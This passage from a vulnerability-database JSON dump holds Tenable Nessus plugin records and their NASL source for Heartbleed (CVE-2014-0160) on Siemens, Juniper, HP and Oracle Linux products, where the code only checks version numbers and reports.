value:\"http://marc.info/?l=bugtraq&m=140015787404650&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139824923705461&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139757919027752&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139774703817488&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905243827825&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140075368411126&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905295427946&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139835844111589&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139757819327350&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139817685517037&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139905351928096&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=139817782017443&w=2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://marc.info/?l=bugtraq&m=140752315422991&w=2\");\n # http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bd05ca98\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661\");\n # http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bc543587\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/59347\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/59243\");\n script_set_attribute(attribute:\"see_also\", value:\"http://secunia.com/advisories/59139\");\n # http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f68d352b\");\n # http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?31a74a0b\");\n # https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b7354398\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.citrix.com/article/CTX140605\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.ubuntu.com/usn/USN-2165-1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/534161/100/0/threaded\");\n # https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b3e9d2b8\");\n # https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6abc3fa\");\n # https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e09c159e\");\n # https://sku11army.blogspot.com/2020/01/heartbleed-hearts-continue-to-bleed.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3aa4af59\");\n # https://lists.apache.org/thread.html/rf8e8c091182b45daa50d3557cad9b10bb4198e3f08cf8f1c66a1b08d@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37006736\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cert-portal.siemens.com/productcert/pdf/ssa-635659.pdf\");\n # https://lists.apache.org/thread.html/re3b72cbb13e1dfe85c4a06959a3b6ca6d939b407ecca80db12b54220@%3Cdev.tomcat.apache.org%3E\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c45738a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Refer to the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:siemens:simatic_s7-1500_firmware:1.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:siemens:simatic_s7-1500t_firmware:1.5\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Tenable.ot\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"tenable_ot_api_integration.nasl\");\n script_require_keys(\"Tenable.ot/Siemens\");\n\n exit(0);\n}\n\n\ninclude('tenable_ot_cve_funcs.inc');\n\nget_kb_item_or_exit('Tenable.ot/Siemens');\n\nvar asset = tenable_ot::assets::get(vendor:'Siemens');\n\nvar vuln_cpes = {\n \"cpe:/o:siemens:simatic_s7-1500_firmware:1.5\" :\n {\"versionEndIncluding\" : \"1.5\", \"versionStartIncluding\" : \"1.5\"},\n \"cpe:/o:siemens:simatic_s7-1500t_firmware:1.5\" :\n {\"versionEndIncluding\" : \"1.5\", \"versionStartIncluding\" : \"1.5\"}\n};\n\ntenable_ot::cve::compare_and_report(asset:asset, cpes:vuln_cpes, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:03:30", "description": "According to its self-reported version, the version of IVE / UAC OS running on the remote host is affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-04-18T00:00:00", "type": "nessus", "title": "Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/o:juniper:ive_os", "cpe:/a:juniper:junos_pulse_secure_access_service", "cpe:/a:juniper:junos_pulse_access_control_service"], "id": "JUNOS_PULSE_JSA10623.NASL", "href": "https://www.tenable.com/plugins/nessus/73688", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73688);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Junos Pulse Secure Access IVE / UAC OS OpenSSL Heartbeat Information Disclosure (JSA10623) (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of IVE / UAC OS\nrunning on the remote host is affected by an information disclosure\nvulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=KB29007\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10623\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Juniper Junos IVE OS version 7.4R9.3 / 8.0R3.2 or later or\nUAC OS version 4.4R10 / 5.0R3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:juniper:ive_os\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_secure_access_service\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:juniper:junos_pulse_access_control_service\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Juniper/IVE OS/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit('Host/Juniper/IVE OS/Version');\nmatch = eregmatch(string:version, pattern:\"^([\\d.]+)[Rr]([0-9.]+)\");\nif (isnull(match)) exit(1, 'Error parsing version: ' + version);\n\nrelease = match[1];\nbuild = match[2];\n\n# IVE OS\n# 7.4R1 to 7.4R9\nif (release == '7.4' && ver_compare(ver:build, fix:'9.3', strict:FALSE) == -1)\n fix = '7.4r9.3';\n# 8.0R1 to 8.0R3\nelse if (release == '8.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '8.0r3.2';\n\n# UAC OS\n# 4.4R1 to 4.4R9\nelse if (release == '4.4' && ver_compare(ver:build, fix:'10', strict:FALSE) == -1)\n fix = '4.4r10';\n# 5.0R1 to 5.0R3\nelse if (release == '5.0' && ver_compare(ver:build, fix:'3.2', strict:FALSE) == -1)\n fix = '5.0r3.2';\n\nelse\n audit(AUDIT_INST_VER_NOT_VULN, 'IVE/UAC OS', version);\n\nif (report_verbosity > 0)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:0, extra:report);\n}\nelse security_warning(0);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:22:26", "description": "The RPM installation of HP Version Control Agent (VCA) on the remote Linux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore, affected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-06T00:00:00", "type": "nessus", "title": "HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/a:hp:version_control_agent"], "id": "HP_VCA_SSRT101531-SLES.NASL", "href": "https://www.tenable.com/plugins/nessus/77023", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77023);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"emr_na-c04262472\");\n script_xref(name:\"HP\", value:\"HPSBMU03020\");\n script_xref(name:\"HP\", value:\"SSRT101531\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"HP Version Control Agent (VCA) Heartbeat Information Disclosure (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host contains software that is affected by an information\ndisclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The RPM installation of HP Version Control Agent (VCA) on the remote\nLinux host is version 7.2.2, 7.3.0, or 7.3.1. It is, therefore,\naffected by an information disclosure vulnerability.\n\nAn out-of-bounds read error, known as the 'Heartbleed Bug', exists\nrelated to handling TLS heartbeat extensions that could allow an\nattacker to obtain sensitive information such as primary key material,\nsecondary key material, and other protected content.\");\n # https://h20565.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c04262472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9ffb6dc\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VCA 7.3.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:version_control_agent\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^SLES\") audit(AUDIT_OS_NOT, \"SuSE Linux Enterprise Server\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\n# These are the only versions the software is supported\n# however you can install it on later versions. So\n# only check non-supported versions if paranoia is on.\nif (\n report_paranoia < 2 &&\n !ereg(pattern:\"SLES(8|9|10|11)($|[^0-9])\", string:release)\n) audit(AUDIT_OS_NOT, \"SuSE Linux Enterprise Server 8 / 9 / 10 / 11\");\n\nrpms = get_kb_item_or_exit(\"Host/SuSE/rpm-list\");\nif (\"hpvca-\" >!< rpms) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"HP Version Control Agent\");\n\n# Get the RPM version\nmatch = eregmatch(string:rpms, pattern:\"(^|\\n)hpvca-(\\d+\\.\\d+\\.\\d+-\\d+)\");\nif (isnull(match)) audit(AUDIT_VER_FAIL, \"HP Version Control Agent\");\n\nversion = match[2];\nversion = ereg_replace(string:version, replace:\".\", pattern:\"-\");\n\nfix = \"7.3.2.0\";\n\n# These specific version lines are affected\nif (\n version =~ \"^7\\.2\\.2\\.\" ||\n version =~ \"^7\\.3\\.[0-1]\\.\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_PACKAGE_NOT_AFFECTED, \"HP Version Control Agent\");\n", "cvss": {"score": 9.4, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"}}, {"lastseen": "2022-05-21T15:22:46", "description": "The version of HP LoadRunner installed on the remote host is 11.52.x prior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is, therefore, affected by an out-of-bounds read error, known as the 'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could allow an attacker to obtain sensitive information such as primary key material, secondary key material, and other protected content.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-08-07T00:00:00", "type": "nessus", "title": "HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["cpe:/a:hp:loadrunner"], "id": "HP_LOADRUNNER_12_00_1.NASL", "href": "https://www.tenable.com/plugins/nessus/77054", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77054);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"HP\", value:\"HPSBMU03040\");\n script_xref(name:\"HP\", value:\"SSRT101565\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"HP LoadRunner 11.52.x < 11.52 Patch 2 / 12.00.x < 12.00 Patch 1 Heartbeat Information Disclosure (Heartbleed)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by an\ninformation disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of HP LoadRunner installed on the remote host is 11.52.x\nprior to 11.52 Patch 2 or 12.00.x prior to 12.00 Patch 1. It is,\ntherefore, affected by an out-of-bounds read error, known as the\n'Heartbleed Bug' in the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content.\");\n # https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c04286049\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c3b43466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/532104/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to HP LoadRunner 11.52 Patch 2 / 12.00 Patch 1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:loadrunner\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"hp_loadrunner_installed.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/HP LoadRunner\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('misc_func.inc');\ninclude(\"install_func.inc\");\n\napp_name = \"HP LoadRunner\";\ncutoff = NULL;\ncutoff2 = NULL;\nfixed = NULL;\nreport = NULL;\n\n# Only 1 install of the server is possible.\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\nverui = install['display_version'];\n\n# Determine cutoff if affected branch.\n# 11.52.0 is 11.52.1323.0 or 11.52.1517.0\n# 12.00.0 is 12.00.661.0\nif (version =~ \"^11\\.52($|[^0-9])\")\n{\n cutoff = \"11.52.1323.0\";\n cutoff2 = \"11.52.1517.0\";\n}\nif (version =~ \"^12\\.00?($|[^0-9])\")\n{\n cutoff = \"12.0.661.0\";\n cutoff2 = \"12.0.661.0\";\n}\n\nif (isnull(cutoff)) audit(AUDIT_NOT_INST, app_name + \" 11.52.x / 12.0.x\");\n\nif (version >= cutoff && version <= cutoff2)\n{\n foreach file (make_list(\"ssleay32_101_x32.dll\", \"ssleay32_101_x64.dll\"))\n {\n dll_path = path + \"bin\\\" + file;\n res = hotfix_get_fversion(path:dll_path);\n err_res = hotfix_handle_error(\n error_code : res['error'],\n file : dll_path,\n appname : app_name,\n exit_on_fail : FALSE\n );\n if (err_res) continue;\n\n dll_ver = join(sep:'.', res['value']);\n break;\n }\n hotfix_check_fversion_end();\n\n if (empty_or_null(dll_ver))\n audit(\n AUDIT_VER_FAIL,\n \"ssleay32_101_x32.dll and ssleay32_101_x64.dll under \" + path + \"bin\\\"\n );\n\n fixed_dll_ver = '1.0.1.4';\n if (ver_compare(ver:dll_ver, fix:fixed_dll_ver, strict:FALSE) == -1)\n report =\n '\\n Path : ' + dll_path +\n '\\n Installed DLL version : ' + dll_ver +\n '\\n Fixed DLL version : ' + fixed_dll_ver +\n '\\n';\n}\n# If not at a patchable version, use ver_compare() and suggest\n# upgrade if needed; do not use cutoff2 - this will lead to\n# false positives.\nelse if (\n (\n cutoff =~ \"^11\\.\" &&\n ver_compare(ver:\"11.52\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n ||\n (\n cutoff =~ \"^12\\.\" &&\n ver_compare(ver:\"12.00\", fix:version, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:cutoff, strict:FALSE) == -1\n )\n)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 11.52.1323.0 (11.52 Patch 2) / 12.0.661.0 (12.00 Patch 1)' +\n '\\n';\n}\n\nif (isnull(report)) audit(AUDIT_INST_PATH_NOT_VULN, app_name, verui, path);\n\nport = kb_smb_transport();\n\nif (report_verbosity > 0) security_warning(extra:report, port:port);\nelse security_warning(port);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-05-21T15:03:29", "description": "From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server could send a specially crafted TLS or DTLS Heartbeat packet to disclose a limited portion of memory per request from a connected client or server. Note that the disclosed portions of memory could potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue. Upstream acknowledges Neel Mehta of Google Security as the original reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.", "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : openssl (ELSA-2014-0376)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2022-05-05T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:openssl", "p-cpe:/a:oracle:linux:openssl-devel", "p-cpe:/a:oracle:linux:openssl-perl", "p-cpe:/a:oracle:linux:openssl-static", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73395", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0376 and \n# Oracle Linux Security Advisory ELSA-2014-0376 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73395);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/05\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"Oracle Linux 6 : openssl (ELSA-2014-0376)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:0376 :\n\nUpdated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS 